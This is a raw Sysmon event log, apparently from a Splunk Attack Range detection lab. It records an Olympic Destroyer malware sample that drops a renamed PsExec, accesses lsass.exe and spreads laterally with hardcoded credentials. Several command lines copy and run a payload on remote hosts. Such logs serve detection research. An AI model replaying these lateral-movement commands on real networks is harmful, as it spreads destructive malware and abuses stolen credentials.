10:57:28.830{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293065Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:28.830{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1318-6216-4C06-000000003802}7072C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293064Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:28.830{C8EA50B7-12E6-6216-4B05-000000003802}67924840C:\Temp\olympic_destroyer.exe{C8EA50B7-1318-6216-4C06-000000003802}7072C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4a2f|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000293063Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:28.831{C8EA50B7-1318-6216-4C06-000000003802}7072C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\10.0.1.1 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 534500x8000000000000000293062Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:28.826{C8EA50B7-12FE-6216-DE05-000000003802}7132C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000293061Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:28.808{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-1318-6216-4B06-000000003802}6572C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000293060Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:28.808{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293059Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:28.808{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293058Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:28.808{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293057Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:28.808{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293056Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:28.808{C8EA50B7-12E6-6216-4B05-000000003802}67926956C:\Temp\olympic_destroyer.exe{C8EA50B7-1318-6216-4B06-000000003802}6572C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4a2f|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000293055Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:28.814{C8EA50B7-1318-6216-4B06-000000003802}6572C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\10.0.1.15 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000293054Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:28.808{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1318-6216-4B06-000000003802}6572C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000293053Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:28.808{C8EA50B7-12FE-6216-DD05-000000003802}6760C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 23542300x8000000000000000293052Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:28.477{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=328E7DD9576BC20FAD26E4A9D1557A6C,SHA256=C32DE8436556BBC55B824B6B53E9037E9B1FC301C68AB483F77A795C325D1787,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217812Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:29.855{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE0811D4473A242F9D212C780544B97B,SHA256=70283E6FDBB9AFB0F4303F115D1F09311578B510BC383A517B8752E1BFAFB439,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293104Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:29.646{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CA4AD8C075206434576F25169477121C,SHA256=97214352FB6ADA8E7B2BB4362EFBA957C4DFB8DA985B0C2C638207F9F337651F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000293103Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:29.593{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-1319-6216-4F06-000000003802}6388C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293102Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:29.593{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-1319-6216-4F06-000000003802}6388C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000293101Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:57:29.593{C8EA50B7-1319-6216-4F06-000000003802}6388C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000293100Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:29.546{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-1319-6216-5006-000000003802}5348C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293099Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:29.546{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-1319-6216-5006-000000003802}5348C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000293098Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:29.546{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=FD7A8CD46D521548B388CB2611334AD7,SHA256=2879C370F9670FD9263DB3D27C7E34493F0C604C1F7ED8D696AFC6DD6AFD7E1C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000293097Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:29.530{C8EA50B7-1319-6216-5006-000000003802}53486176C:\Windows\system32\conhost.exe{C8EA50B7-1319-6216-4F06-000000003802}6388C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293096Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:29.462{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-1319-6216-5006-000000003802}5348C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000293095Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:29.446{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1319-6216-5006-000000003802}5348C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293094Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:29.446{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293093Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:29.446{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293092Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:29.446{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293091Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:29.446{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293090Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:29.332{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-1319-6216-4F06-000000003802}6388C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000293089Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:29.326{C8EA50B7-12E6-6216-4B05-000000003802}67926936C:\Temp\olympic_destroyer.exe{C8EA50B7-1319-6216-4F06-000000003802}6388C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4985|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000293088Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:29.325{C8EA50B7-1319-6216-4F06-000000003802}6388C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\224.0.0.252 -u "VULT\r.vult" -p "LottaVirus2019" -accepteula -d -s -c -f 